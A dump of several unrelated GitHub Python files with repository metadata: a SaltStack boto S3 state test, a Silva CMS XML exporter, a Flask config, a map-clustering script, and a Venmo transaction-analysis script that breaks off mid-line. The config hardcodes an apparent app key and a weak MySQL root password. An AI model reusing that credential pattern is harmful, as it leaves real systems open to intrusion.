'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:111111222222:function:my-function',\n 'Id': 'zxcvbnmlkjhgfdsa',\n 'Events': [\"s3:ObjectCreated:*\"],\n 'Filter': {\n 'Key': {\n 'FilterRules': [{\n 'Name': 'prefix',\n 'Value': 'string'\n }]\n }\n }\n }]\n },\n 'get_bucket_policy': {\n 'Policy':\n '{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111111222222:root\"},\"Action\":\"s3:PutObject\",\"Resource\":\"arn:aws:s3:::my-bucket/*\"}]}'\n },\n 'get_bucket_replication': {\n 'ReplicationConfiguration': {\n 'Role': 'arn:aws:iam::11111222222:my-role',\n 'Rules': [{\n 'ID': \"r1\",\n 'Prefix': \"prefix\",\n 'Status': \"Enabled\",\n 'Destination': {\n 'Bucket': \"arn:aws:s3:::my-bucket\"\n }\n }]\n }\n },\n 'get_bucket_request_payment': {'Payer': 'Requester'},\n 'get_bucket_tagging': {\n 'TagSet': [{\n 'Key': 'c',\n 'Value': 'd'\n }, {\n 'Key': 'a',\n 'Value': 'b',\n }]\n },\n 'get_bucket_versioning': {\n 'Status': 'Enabled'\n },\n 'get_bucket_website': {\n 'ErrorDocument': {\n 'Key': 'error.html'\n },\n 'IndexDocument': {\n 'Suffix': 'index.html'\n }\n }\n }\n bucket_ret = {\n 'Location': 'EU'\n }\n\n\n@skipIf(HAS_BOTO is False, 'The boto module must be installed.')\n@skipIf(_has_required_boto() is False, 'The boto3 module must be greater than'\n ' or equal to version {0}'\n .format(required_boto3_version))\n@skipIf(NO_MOCK, NO_MOCK_REASON)\nclass BotoS3BucketStateTestCaseBase(TestCase, LoaderModuleMockMixin):\n conn = None\n\n def setup_loader_modules(self):\n ctx = {}\n utils = salt.loader.utils(self.opts, whitelist=['boto', 'boto3'], context=ctx)\n serializers = salt.loader.serializers(self.opts)\n self.funcs = funcs = salt.loader.minion_mods(self.opts, context=ctx, utils=utils, whitelist=['boto_s3_bucket'])\n self.salt_states = salt.loader.states(opts=self.opts, functions=funcs, utils=utils, whitelist=['boto_s3_bucket'],\n serializers=serializers)\n return {\n boto_s3_bucket: {\n '__opts__': self.opts,\n '__salt__': funcs,\n '__utils__': utils,\n '__states__': self.salt_states,\n '__serializers__': serializers,\n }\n }\n\n @classmethod\n def setUpClass(cls):\n cls.opts = salt.config.DEFAULT_MINION_OPTS\n cls.opts['grains'] = salt.loader.grains(cls.opts)\n\n @classmethod\n def tearDownClass(cls):\n del cls.opts\n\n def setUp(self):\n self.addCleanup(delattr, self, 'funcs')\n self.addCleanup(delattr, self, 'salt_states')\n # connections keep getting cached from prior tests, can't find the\n # correct context object to clear it. So randomize the cache key, to prevent any\n # cache hits\n conn_parameters['key'] = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))\n\n self.patcher = patch('boto3.session.Session')\n self.addCleanup(self.patcher.stop)\n self.addCleanup(delattr, self, 'patcher')\n mock_session = self.patcher.start()\n\n session_instance = mock_session.return_value\n self.conn = MagicMock()\n self.addCleanup(delattr, self, 'conn')\n session_instance.client.return_value = self.conn\n\n\nclass BotoS3BucketTestCase(BotoS3BucketStateTestCaseBase, BotoS3BucketTestCaseMixin):\n '''\n TestCase for salt.modules.boto_s3_bucket state.module\n '''\n\n def test_present_when_bucket_does_not_exist(self):\n '''\n Tests present on a bucket that does not exist.\n '''\n self.conn.head_bucket.side_effect = [not_found_error, None]\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n self.conn.create_bucket.return_value = bucket_ret\n for key, value in six.iteritems(config_ret):\n getattr(self.conn, key).return_value = deepcopy(value)\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n **config_in\n )\n\n self.assertTrue(result['result'])\n self.assertEqual(result['changes']['new']['bucket']['Location'], config_ret['get_bucket_location'])\n\n def test_present_when_bucket_exists_no_mods(self):\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n for key, value in six.iteritems(config_ret):\n getattr(self.conn, key).return_value = deepcopy(value)\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n **config_in\n )\n\n self.assertTrue(result['result'])\n self.assertEqual(result['changes'], {})\n\n def test_present_when_bucket_exists_all_mods(self):\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n for key, value in six.iteritems(config_ret):\n getattr(self.conn, key).return_value = deepcopy(value)\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n LocationConstraint=config_in['LocationConstraint']\n )\n\n self.assertTrue(result['result'])\n self.assertNotEqual(result['changes'], {})\n\n def test_present_with_failure(self):\n self.conn.head_bucket.side_effect = [not_found_error, None]\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n self.conn.create_bucket.side_effect = ClientError(error_content, 'create_bucket')\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n **config_in\n )\n self.assertFalse(result['result'])\n self.assertTrue('Failed to create bucket' in result['comment'])\n\n def test_absent_when_bucket_does_not_exist(self):\n '''\n Tests absent on a bucket that does not exist.\n '''\n self.conn.head_bucket.side_effect = [not_found_error, None]\n result = self.salt_states['boto_s3_bucket.absent']('test', 'mybucket')\n self.assertTrue(result['result'])\n self.assertEqual(result['changes'], {})\n\n def test_absent_when_bucket_exists(self):\n result = self.salt_states['boto_s3_bucket.absent']('test', 'testbucket')\n self.assertTrue(result['result'])\n self.assertEqual(result['changes']['new']['bucket'], None)\n\n def test_absent_with_failure(self):\n self.conn.delete_bucket.side_effect = ClientError(error_content, 'delete_bucket')\n result = self.salt_states['boto_s3_bucket.absent']('test', 'testbucket')\n self.assertFalse(result['result'])\n self.assertTrue('Failed to delete bucket' in result['comment'])\n","repo_name":"gtmanfred/fractus","sub_path":"tests/unit/states/skip_test_boto_s3_bucket.py","file_name":"skip_test_boto_s3_bucket.py","file_ext":"py","file_size_in_byte":14024,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"40770721915","text":"import logging\n\nfrom five import grok\nfrom zope.interface import Interface\n\nfrom silva.core.editor.transform.base import TransformationFilter\nfrom silva.core.editor.transform.interfaces import ISilvaXMLExportFilter\nfrom silva.core.interfaces import IVersion, ISilvaXMLProducer\nfrom silva.core.xml import producers, NS_SILVA_URI\nfrom zeam.component import getWrapper\nfrom zeam.form.silva.interfaces import IXMLFormSerialization\n\nfrom . import NS_SOURCE_URI\nfrom ..interfaces import IExternalSourceManager\nfrom ..interfaces import ISourceAsset, ISourceAssetVersion\nfrom ..errors import SourceError\nfrom .treehandler import ElementTreeContentHandler\n\n\nlogger = logging.getLogger('silva.core.xml')\n\n\nclass FieldProducer(ElementTreeContentHandler):\n\n def __init__(self, context, handler, **kwargs):\n ElementTreeContentHandler.__init__(self, **kwargs)\n self.context = context\n self.__handler = handler\n\n def getHandler(self):\n return self.__handler\n\n\nclass ExternalSourceExportFilter(TransformationFilter):\n grok.adapts(IVersion, ISilvaXMLProducer)\n grok.provides(ISilvaXMLExportFilter)\n\n def __init__(self, context, handler):\n self.context = context\n self.handler = handler\n\n def prepare(self, name, text):\n self.sources = getWrapper(self.context, IExternalSourceManager)\n\n def __call__(self, tree):\n exported = self.handler.getExported()\n for node in tree.xpath(\n '//html:div[contains(@class, \"external-source\")]',\n namespaces={'html': 'http://www.w3.org/1999/xhtml'}):\n if 'data-source-instance' not in node.attrib:\n exported.reportProblem(\n u'Broken source in document while exporting: '\n u'Source parameters are missing.',\n self.context)\n continue\n identifier = node.attrib['data-source-instance']\n del node.attrib['data-source-instance']\n\n try:\n source = self.sources(exported.request, instance=identifier)\n except SourceError as error:\n exported.reportProblem(\n u'Broken source in document while exporting:'\n u'{0}'.format(error),\n self.context)\n continue\n if source.source is None:\n exported.reportProblem(\n u'Broken source in document while exporting: '\n u'source is no longer installed in the Silva site.',\n self.context)\n continue\n node.attrib['source-identifier'] = source.getSourceId()\n\n # Fix this.\n producer = FieldProducer(self.context, self.handler, root=node)\n producer.startPrefixMapping(None, NS_SOURCE_URI)\n producer.startElement('fields')\n for serializer in getWrapper(\n source, IXMLFormSerialization).getSerializers():\n producer.startElement(\n 'field', {(None, 'id'): serializer.identifier})\n serializer(producer)\n producer.endElement('field')\n producer.endElement('fields')\n producer.endPrefixMapping(None)\n\n\nclass SourceParametersProducer(object):\n \"\"\" A Mixin class for exporting a source parameters.\n \"\"\"\n\n def getHandler(self):\n return self\n\n def sax_source_parameters(self, source_manager):\n \"\"\"`source_manager` should be a IExternalSourceManager bounded to\n an instance.\n \"\"\"\n self.startElementNS(NS_SOURCE_URI, 'fields')\n for serializer in getWrapper(\n source_manager, IXMLFormSerialization).getSerializers():\n self.startElementNS(\n NS_SOURCE_URI,\n 'field',\n {(None, 'id'): serializer.identifier})\n serializer(self)\n self.endElementNS(NS_SOURCE_URI, 'field')\n self.endElementNS(NS_SOURCE_URI, 'fields')\n\n\nclass SourceAssetProducer(producers.SilvaVersionedContentProducer):\n grok.adapts(ISourceAsset, Interface)\n\n def sax(self):\n self.startElementNS(NS_SOURCE_URI, 'source_asset',\n {'id': self.context.id})\n self.sax_workflow()\n self.sax_versions()\n self.endElementNS(NS_SOURCE_URI, 'source_asset')\n\n\nclass SourceAssetVersionProducer(producers.SilvaProducer,\n SourceParametersProducer):\n grok.adapts(ISourceAssetVersion, Interface)\n\n def sax(self):\n manager = self.context.get_controller(self.getExported().request)\n self.startElementNS(\n NS_SILVA_URI,\n 'content',\n {'version_id': self.context.id,\n 'source_identifier': manager.getSourceId()})\n self.sax_metadata()\n self.sax_source_parameters(manager)\n self.endElementNS(NS_SILVA_URI, 'content')\n\n","repo_name":"silvacms/Products.SilvaExternalSources","sub_path":"Products/SilvaExternalSources/silvaxml/xmlexport.py","file_name":"xmlexport.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"44345172390","text":"DEBUG=True\nSQLALCHEMY_ECHO=True\nSQLALCHEMY_ENCODING=\"utf-8\"\nSERVER_PORT=9000\nSQLALCHEMY_DATABASE_URI='mysql://root:123456@127.0.0.1/food_db'\nSQLALCHEMY_TRACK_MODIFICATIONS=False\nJSON_AS_ASCII=False\n\n##过滤url\nIGNORE_URLS = [\n \"^/user/login\",\n \"^/api\"\n]\n\nIGNORE_CHECK_LOGIN_URLS = [\n \"^/static\",\n \"^/favicon.ico\"\n]\n\nAPI_IGNORE_URLS = [\n \"^/api\"\n]\n\nSTATUS_MAPPING = {\n \"1\":\"正常\",\n \"0\":\"已删除\"\n}\nPAGE_SIZE=50\nPAGE_DISPLAY=10\n\n\n\nMINA_APP={\n \"appid\":\"wx4ef416cbfab4b7c3\",\n \"appkey\":\"6b56c913e3cdc88627f179d72ac30c01\"\n}\n\nUPLOAD = {\n 'ext':[ 'jpg','gif','bmp','jpeg','png' ],\n 'prefix_path':'/web/static/upload/',\n 'prefix_url':'/static/upload/'\n}\n\nAPP = {\n 'domain':'http://127.0.0.1:9000'\n}\n\n\nPAY_STATUS_MAPPING = {\n \"1\":\"已支付\",\n \"-8\":\"待支付\",\n \"0\":\"已关闭\"\n}\n\nPAY_STATUS_DISPLAY_MAPPING = {\n \"0\":\"订单关闭\",\n \"1\":\"支付成功\",\n \"-8\":\"待支付\",\n \"-7\":\"待发货\",\n \"-6\":\"待确认\",\n \"-5\":\"待评价\"\n}","repo_name":"wenrenzhejie/Ordering","sub_path":"config/base_setting.py","file_name":"base_setting.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23785591167","text":"def solution(numbers):\n answer = []\n length = len(numbers)\n for i in range(length):\n for j in range(i+1, length):\n val = numbers[i] + numbers[j]\n if val not in answer:\n answer.append(val)\n answer.sort()\n return answer\nprint(solution([2,1,3,4,1]))","repo_name":"leedh2004/2021-Algorithm-PS","sub_path":"programmers/68644.py","file_name":"68644.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18425516174","text":"from flask import Flask, render_template\nfrom flask_googlemaps import GoogleMaps\nfrom flask_googlemaps import Map\nimport pandas as pd\n\n#data = pd.read_csv(\"Meteorite_Landings.csv\")\ndata = pd.read_csv(\"MetSmall.txt\")\n#print(list(data))\nmeteorits = data[['name', 'GeoLocation']]\n#print(meteorits.head())\n\ndef solv(r):\n import math\n import pandas as pd\n import numpy as np\n import matplotlib.pyplot as plt\n #fixed_df = pd.read_csv('data.txt', # Это то, куда вы скачали файл\n # sep='\\t', encoding='latin1',)\n #fixed_df = pd.read_csv('smalldata.txt', # Это то, куда вы скачали файл\n # sep='\\t', encoding='latin1',)\n fixed_df = pd.read_csv('data.txt', # Это то, куда вы скачали файл\n sep='\\t', encoding='latin1',)\n x=fixed_df.iloc[:, 1]\n y=fixed_df.iloc[:, 2]\n mt = fixed_df[['LAT abs','LON abs']]\n\n def dist(a,b):\n R = 6371\n dLat = (b[0] - a[0])*math.pi/180\n dLon = (b[1] - a[1])*math.pi/180\n a = math.sin(dLat / 2) * math.sin(dLat / 2) + math.cos(b[0] * math.pi / 180) * math.cos(a[0] * math.pi / 180) *math.sin(dLon / 2) * math.sin(dLon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = R * c\n return d\n\n\n Matrix_dist = np.zeros((len(x), len(x)))\n\n # matrixes of distances\n\n for i in range(len(x)):\n for j in range(len(x)):\n Matrix_dist[i][j] = dist(mt.iloc[i], mt.iloc[j])\n\n\n class Cluster:\n def __init__(self, x, y):\n self.x = int(x)\n self.y = int(y)\n # self.data = {self.x,self.y}\n self.data = [self.x, self.y]\n\n\n\n from scipy.cluster.hierarchy import dendrogram, linkage\n #r = 3.5\n #Z = linkage(Matrix_dist, method='single')\n #Z = linkage(Matrix_dist, method='average')\n Z = linkage(Matrix_dist, method='ward')\n K = []\n for point in Z:\n if point[2] < r:\n K.append(point)\n size = len(Z) + 1\n count = 0\n vectorOfClusters = []\n for p in K:\n vectorOfClusters.append(Cluster(p[0], p[1]))\n\n indexes_clusters_to_delete = []\n for vec in vectorOfClusters:\n if (vec.x >= size):\n indexes_clusters_to_delete.append(vec.x - size)\n if (vec.y >= size):\n indexes_clusters_to_delete.append(vec.y - size)\n\n for ins in vectorOfClusters:\n if (ins.x >= size and ins.y >= size):\n ins.data = []\n ins.data = vectorOfClusters[ins.x - size].data + vectorOfClusters[ins.y - size].data\n\n if (ins.x >= size and ins.y < size):\n del ins.data[0]\n ins.data = ins.data + vectorOfClusters[ins.y - size].data\n\n if (ins.x < size and ins.y >= size):\n del ins.data[1]\n ins.data = ins.data + vectorOfClusters[ins.y - size].data\n\n finalVectorArray = []\n arrOfClu = []\n ind = 0\n for vec in vectorOfClusters:\n if (ind not in indexes_clusters_to_delete):\n #print(vec)\n finalVectorArray.append(vec.data)\n arrOfClu += vec.data\n ind += 1\n\n for i in finalVectorArray:\n print(i)\n\n count = []\n for i in range(len(x)):\n if (i not in arrOfClu):\n count.append(i)\n\n\n\n\n col = 0\n centerClusters = []\n countJ = 0\n sumPoint = [0, 0]\n for j in finalVectorArray:\n print(j)\n X = np.zeros((len(j), 2))\n i = 0\n if i < X.shape[0]:\n for k in j:\n X[i][0] = mt.iloc[k][0]\n X[i][1] = mt.iloc[k][1]\n\n sumPoint[0] += X[i][0]\n sumPoint[1] += X[i][1]\n i += 1\n\n\n\n # print(\"j: {} , Matrix.x : {} , Matrix.y : {}\".format(k,Matrix[j][0],Matrix[j][1]))\n # print(X)\n\n\n centerClusters.append([sumPoint[0] / len(j), sumPoint[1] / len(j)])\n sumPoint[0] = 0\n sumPoint[1] = 0\n\n col += 1\n countJ += 1\n\n print(\"--------------------------\")\n centerClusters = np.array(centerClusters)\n\n print(\"--------------------------\")\n Y = np.zeros((len(count), 2))\n # print(count)\n t = 0\n for s in count:\n Y[t][0] = mt.iloc[s][0]\n Y[t][1] = mt.iloc[s][1]\n #\n t += 1\n print(mt.head())\n\n class Point:\n def __init__(self, x, y, label):\n self.x = x\n self.y = y\n self.label = label\n\n\n vectorPoins = []\n lab = 0\n for vec in finalVectorArray:\n for cl in vec:\n print(cl)\n vectorPoins.append(Point(mt.iloc[cl][0], mt.iloc[cl][1], lab))\n lab += 1\n print(\"---\")\n return vectorPoins\n\n#arr = solv()\n\n'''\ndef generate_markers(meteors):\n markers = []\n for idx, row in meteors.iterrows():\n try:\n\n lat, lng = row[1].split(',')\n tmp = {}\n #tmp['icon']= 'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png'\n #tmp['lat']=float(lat[2:])\n #tmp['lng']=float(lng[:-2])\n tmp['lat'] = 50.412244\n tmp['lng'] = 30.389385\n #tmp['infobox']=str(row[0]) + \" \" + \";\".join([lat[2:], lng[:-2]])\n except:\n continue\n #print(tmp)\n markers.append(tmp)\n return markers\n\n'''\n\n\narr = solv(30)\ndef getMatrker():\n markers = []\n #arr = solv()\n ico = ['http://maps.google.com/mapfiles/ms/icons/yellow-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/pink-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/green-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/orange-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/purple-dot.png'\n ]\n ico = ico*100\n #i = 0\n for a in arr:\n labels = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n tmp = {}\n\n #tmp['icon'] = 'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png'\n\n tmp['icon'] = ico[a.label]\n tmp['infobox'] = \"\"+str(a.label)+\"\"\n #i+=1\n tmp['lat'] = a.x\n tmp['lng'] = a.y\n markers.append(tmp)\n return markers\n\n\n\n\n\n\napp = Flask(__name__, template_folder=\".\")\nGoogleMaps(app)\n\n@app.route(\"/\")\ndef mapview():\n # creating a map in the view\n sndmap = Map(\n identifier=\"sndmap\",\n style=(\n \"height:100%;\"\n \"width:100%;\"\n \"top:0;\"\n \"left:0;\"\n \"position:absolute;\"\n \"z-index:200;\"),\n lat=50.40982,\n lng=30.34238,\n #markers=generate_markers(meteorits),\n markers = getMatrker(),\n zoom = 12\n )\n\n return render_template('example.html', sndmap=sndmap)\n\nif __name__ == \"__main__\":\n #app.run(debug=True)\n app.run()\n","repo_name":"twominutestomidnight/clustering","sub_path":"renderPoints/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12960490475","text":"import json\r\nimport emoji\r\nfrom pprint import pprint\r\nfrom collections import Counter\r\nfrom urllib.parse import urlparse\r\n\r\n## Load file\r\n#load in json'\r\nprint(\"loading in\")\r\nwith open('merged_filebig.json') as f:\r\n data = json.load(f)\r\n\r\nprint(\"json loaded\")\r\n#Get rid of duplicate Transactions\r\nz = [];\r\n\r\nprint(\"appending data\")\r\nfor x in range(len(data)):\r\n if 'error' not in data[x]:\r\n z.append(data[x]['data']);\r\n\r\nnoDupList = [];\r\nfor x in range(len(z)):\r\n for y in range(len(z[x])):\r\n noDupList.append(z[x][y])\r\n \r\nprint(\"now analyze\")\r\n## Remove duplicate transactions\r\nprint(\"removing duplicates\")\r\nnoDupList = [];\r\nfor x in range(len(z)):\r\n \r\n for y in range(len(z[x])):\r\n if z[x][y] not in noDupList:\r\n noDupList.append(z[x][y])\r\n else:\r\n print((x,\"duplicate\"))\r\n\r\n# Scripts for Profile Pictures\r\n#######################################################################\r\n#Get all of the profile picture hosts\r\npicList = [];\r\nnoPicList = [];\r\nu = 0;\r\nfor x in range(len(noDupList)):\r\n if 'picture' in noDupList[x]['transactions'][0]['target']:\r\n picList.append(noDupList[x]['transactions'][0]['target']['picture'])\r\n else:\r\n if 'redeemable_target' not in noDupList[x]['transactions'][0]['target']:\r\n noPicList.append(noDupList[x]['transactions'][0]['target'])\r\n else:\r\n noPicList.append(noDupList[x]['transactions'][0]['target']['redeemable_target']['type'])\r\n \r\n if 'picture' in noDupList[x][\"actor\"]:\r\n picList.append(noDupList[x][\"actor\"]['picture']);\r\n else:\r\n if 'redeemable_target' not in noDupList[x][\"actor\"]:\r\n noPicList.append(noDupList[x][\"actor\"])\r\n else:\r\n noPicList.append(noDupList[x][\"actor\"]['redeemable_target']['type'])\r\n#Parse out information we don't care about\r\nfor x in range(len(picList)):\r\n\tpicList[x] = urlparse(picList[x]).netloc\r\n\r\nfor x in noPicList:\r\n picList.append(x);\r\n#count each picture host\r\npicHostCount = Counter(picList)\r\n\r\n\r\nprint(picHostCount)\r\n#####################################################################\r\n#count how many payments and how many charges among transactions\r\n\r\npaymentsVsTransactions = [];\r\n\r\nfor x in range(len(noDupList)):\r\n paymentsVsTransactions.append(noDupList[x]['type'])\r\n\r\npVTCount = Counter(paymentsVsTransactions)\r\n\r\nprint(pVTCount)\r\n####################################################################\r\n#find most popular actors\r\nactors = [];\r\nfor x in range(len(noDupList)):\r\n actors.append(noDupList[x]['actor']['username'])\r\n\r\nrankedActors = Counter(actors).most_common(100)\r\nprint(rankedActors)\r\n####################################################################\r\n#find most popular targets\r\ntargets = [];\r\ntu = 0;\r\nfor x in range(len(noDupList)):\r\n if 'username'in noDupList[x]['transactions'][0]['target']:\r\n targets.append(noDupList[x]['transactions'][0]['target']['username'])\r\n else:\r\n if 'redeemable_target' not in noDupList[x]['transactions'][0]['target']:\r\n #print(noDupList[x]['transactions'][0]['target'])\r\n targets.append(noDupList[x]['transactions'][0]['target'])\r\n else:\r\n #print(noDupList[x]['transactions'][0]['target']['redeemable_target'])\r\n targets.append(noDupList[x]['transactions'][0]['target']['redeemable_target']['display_name'])\r\n \r\n\r\nrankedTargets = Counter(targets).most_common(100)\r\nprint(rankedTargets)\r\n####################################################################\r\n###When accounts were created\r\naccountCreationDates = []\r\nfor x in range(len(noDupList)):\r\n if 'date_created' in noDupList[x]['transactions'][0]['target']:\r\n accountCreationDates.append(noDupList[x]['transactions'][0]['target']['date_created'][0:7])\r\n else:\r\n accountCreationDates.append('No date Provided')\r\n accountCreationDates.append(noDupList[x]['actor']['date_created'][0:7])\r\n\r\ncountedDates = Counter(accountCreationDates)\r\n####################################################################\r\n#targetIsBusiness\r\ntargetIsBusiness = []\r\n\r\nfor x in range(len(noDupList)):\r\n if 'is_business' in noDupList[x]['transactions'][0]['target']:\r\n targetIsBusiness.append(noDupList[x]['transactions'][0]['target']['is_business'])\r\n else:\r\n targetIsBusiness.append(False)\r\n\r\ntargetBusinessCount = Counter(targetIsBusiness)\r\nprint(targetBusinessCount.most_common(10))\r\n#####################################################################\r\n#actorIsBusiness\r\nactorIsBusiness = []\r\n\r\nfor x in range(len(noDupList)):\r\n actorIsBusiness.append(noDupList[x]['actor']['is_business'])\r\n\r\nactorBusinessCount = Counter(actorIsBusiness)\r\n\r\nprint(actorBusinessCount.most_common(10))\r\n###################################################################\r\n#find most popular emojis overall\r\nallMessages = []\r\nfor x in range(len(noDupList)):\r\n allMessages.append(noDupList[x]['message'])\r\n\r\npopularEmojis = []\r\nfor x in allMessages:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojis.append(character);\r\n\r\ntopHundredEmojis = Counter(popularEmojis).most_common(100) \r\n\r\n#find most popular emojis on different days of week\r\nmessagesOnDate = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-06':\r\n messagesOnDate.append(noDupList[x]['message'])\r\n \r\n####################################################################\r\n#MAYBE? Find most popular words in message\r\npopularWords = []\r\nfor x in allMessages:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWords.append(word)\r\n\r\ntopHundredWords = Counter(popularWords).most_common(100)\r\n#####################################################################\r\n#Information for Sunday\r\nmessagesOnSunday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-18':\r\n messagesOnSunday.append(noDupList[x]['message'])\r\n\r\n#Top words on Sunday\r\npopularWordsSun = []\r\nfor x in messagesOnSunday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsSun.append(word)\r\n\r\ntopHundredWordsSun = Counter(popularWordsSun).most_common(100)\r\n\r\n#top Emojis on Sunday\r\npopularEmojisSun = []\r\nfor x in messagesOnSunday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisSun.append(character);\r\n\r\ntopHundredEmojisSun = Counter(popularEmojisSun).most_common(100)\r\n####################################################################\r\n\r\n#Information for Monday\r\nmessagesOnMonday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-12':\r\n messagesOnMonday.append(noDupList[x]['message'])\r\n\r\n#Top words on Monday\r\npopularWordsMon = []\r\nfor x in messagesOnMonday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsMon.append(word)\r\n\r\ntopHundredWordsMon = Counter(popularWordsMon).most_common(100)\r\n#top Emojis on Monday\r\npopularEmojisMon = []\r\nfor x in messagesOnMonday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisMon.append(character);\r\n\r\ntopHundredEmojisMon = Counter(popularEmojisMon).most_common(100)\r\n################################################################### \r\n#Information for Tuesday\r\nmessagesOnTuesday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-13':\r\n messagesOnTuesday.append(noDupList[x]['message'])\r\n\r\n#Top words on Tuesday\r\npopularWordsTu = []\r\nfor x in messagesOnTuesday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsTu.append(word)\r\n\r\ntopHundredWordsTu = Counter(popularWordsTu).most_common(100)\r\n#top Emojis on Tuesday\r\npopularEmojisTu = []\r\nfor x in messagesOnTuesday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisTu.append(character);\r\n\r\ntopHundredEmojisTu = Counter(popularEmojisTu).most_common(100)\r\n##################################################################\r\n#Information for Wednesday\r\nmessagesOnWednesday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-14':\r\n messagesOnWednesday.append(noDupList[x]['message'])\r\n\r\n#Top words on Wed\r\npopularWordsWed = []\r\nfor x in messagesOnWednesday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsWed.append(word)\r\n\r\ntopHundredWordsWed = Counter(popularWordsWed).most_common(100)\r\n#top Emojis on Wed\r\npopularEmojisWed = []\r\nfor x in messagesOnWednesday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisWed.append(character);\r\n\r\ntopHundredEmojisWed = Counter(popularEmojisWed).most_common(100)\r\n##################################################################\r\n#Information for Thursday\r\nmessagesOnThursday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-15':\r\n messagesOnThursday.append(noDupList[x]['message'])\r\n\r\n#Top words on Thur\r\npopularWordsThur = []\r\nfor x in messagesOnThursday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsThur.append(word)\r\n\r\ntopHundredWordsThur = Counter(popularWordsThur).most_common(100)\r\n\r\n#top Emojis on Thur\r\npopularEmojisThur = []\r\nfor x in messagesOnThursday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisThur.append(character);\r\n\r\ntopHundredEmojisThur = Counter(popularEmojisThur).most_common(100)\r\n\r\n##################################################################\r\n#Information for Friday\r\nmessagesOnFriday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-16':\r\n messagesOnFriday.append(noDupList[x]['message'])\r\n\r\n#Top words on Friday\r\npopularWordsFri = []\r\nfor x in messagesOnFriday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsFri.append(word)\r\n\r\ntopHundredWordsFri = Counter(popularWordsFri).most_common(100)\r\n\r\n#top Emojis on Friday\r\npopularEmojisFri = []\r\nfor x in messagesOnFriday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisFri.append(character);\r\n\r\ntopHundredEmojisFri = Counter(popularEmojisFri).most_common(100)\r\n\r\n##################################################################\r\n#Information for Saturday\r\nmessagesOnSaturday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-17':\r\n messagesOnSaturday.append(noDupList[x]['message'])\r\n\r\n#Top words on Saturday\r\npopularWordsSat = []\r\nfor x in messagesOnSaturday:\r\n split = x.split(\" \")\r\n for word in 